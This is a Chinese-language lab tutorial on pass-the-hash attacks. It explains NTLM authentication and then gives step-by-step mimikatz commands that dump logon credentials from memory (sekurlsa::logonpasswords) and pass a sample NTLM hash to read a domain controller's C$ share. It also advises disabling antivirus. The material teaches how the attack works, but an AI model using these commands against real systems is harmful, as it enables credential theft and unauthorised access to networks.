内网渗透(哈希传递)

概念

早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。

哈希传递前提

同密码(攻击主机与实现主机两台要密码一致)。

NTLM协议

加密ntlm哈希

转换成16进制------转换成加密------转换成MD4

NTLM协议:用于远程登录。例如 22

原理

  1. client(win10)将账户名(test)传给server。
  2. 在server中判断本地账户名(test)是否存在,没有就失败,有的话生成challenge(随机生成的),查找user对应的NTLM哈希(在sam里找),使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client(win10)。
  3. client(win10)接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,将response发送给server。
  4. server对比自己内存中的net-ntlm hash与client(win10)发来的response是否一致。

哈希传递攻击

哈希传递攻击的前提

  • 首先是管理员,必须提前从不同用户变成管理员
  • 需要用户名和ntml哈希值
  • 如果对方主机在域内,就使用域名;如果不在域内,就使用工作组环境的攻击方式

什么情况下会用哈希传递攻击

  • 攻陷一台主机以后,抓不到该主机用户的明文密码
  • 失陷主机和局域网内存在相同密码

哈希传递攻击

工具:mimikatz

环境:域控(server 2008)、客户机(win 7)

网段:在同一网段,都为NAT模式

域控(server)

  • 静态IP:10.1.1.1

在server中查看445是否开放

  • 查看域控C盘
  • 共享C盘(在cmd中输入命令net share

客户端开始攻击(win7)

  • IP:10.1.1.2

  • 关闭杀毒软件

用mimikatz64位工具,必须是system权限

在打开cmd命令解释器必须以管理员身份运行(因为要用到mimikatz工具)

进入mimikatz.exe

攻击利用

  • 提升权限(注:需以管理员权限运行)
bash 复制代码
privilege::debug
  • 获取内存中保存的登录信息
bash 复制代码
sekurlsa::logonpasswords 
  • 并抓到自己用户的哈希值(NTLM)
  • 进行哈希攻击
php 复制代码
sekurlsa::pth /user:administrator /domain:xiusafe.com /ntlm:32ed87bdb5fdc5e9cba88547376818d4  #pth是哈希传递,domain后面跟的是域
  • 同时弹出一个新的cmd窗口

此时哈希值已经准备好,但还未攻击

开始攻击

  • 查看域控(server)C盘
php 复制代码
dir \\10.1.1.1\c$
  • 与域控C盘进行对比
  • 攻击成功

总结

哈希传递攻击是由于局域网内有多台主机存在相同密码造成的,绕过ntlm认证。

相关推荐
爱睡懒觉的焦糖玛奇朵4 小时前
【从视频到数据集:焦糖玛奇朵的魔法工具使用说明】
人工智能·python·深度学习·学习·算法·yolo·音视频
Runawayliquor4 小时前
opbase:CANN 所有算子的公共地基
大数据·数据库·人工智能·算法
徐安安ye4 小时前
FlashAttention 为什么对序列长度这么“敏感”?
人工智能·算法
齐齐大魔王5 小时前
Linux-网络编程实战
linux·运维·网络
智塑未来5 小时前
app应用怎么接入广告?标准流程与落地实操方案全解析
大数据·网络·人工智能
wanhengidc6 小时前
私有云的作用都有哪些?
运维·服务器·网络·游戏·智能手机
CTO Plus技术服务中6 小时前
71款企业级自研产品,线上演示环境
网络
黎阳之光6 小时前
黎阳之光:以视频孪生重构智能监盘,为燃机打造新一代智慧电厂大脑
大数据·人工智能·算法·安全·数字孪生
Bruce_Liuxiaowei6 小时前
2026年5月第4周网络安全形势周报
网络·人工智能·安全·web安全·网络安全·系统安全
绝知此事6 小时前
【算法突围 02】树形结构与数据库索引:树形结构与数据库索引:从 BST 到 B+ 树的演化与 MySQL 优化
数据库·mysql·算法·面试·b+树